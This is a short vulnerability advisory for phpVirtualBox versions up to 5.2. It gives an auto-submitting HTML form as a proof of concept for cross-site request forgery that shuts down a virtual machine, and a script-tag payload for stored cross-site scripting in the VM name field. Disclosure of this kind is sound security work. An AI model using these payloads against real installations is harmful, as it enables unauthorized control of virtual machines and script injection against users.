# Title: phpVirtualBox / CSRF - Stored XSS
# Date: 03/04/2018
# Discovered by: @codexlynx
# Software Version: <= 5.2
# Category: php, web, csrf, xss

[1]CSRF
--------------------------------
The backend doesn't validate the origin of the actions.

  - POC: Shutdown a VM

<body onload="document.csrf.submit();">
  <form method="post" action="<TARGET>/<PHPVB_PATH>/lib/ajax.php" name="csrf">
    <input type="hidden" name="vm" value="<VM_ID>" />
    <input type="hidden" name="state" value="powerDown" />
    <input type="hidden" name="fn" value="machineSetState" />
  </form>
</body>

[2]Stored XSS
--------------------------------
Many fields don't sanitize inputs. This vulnerability could allow a user role escalation in the application.

  - POC: Insert a persistent script in the vm name field.

New (Create Virtual Machine) -> Name: <script>alert(1);</script>Test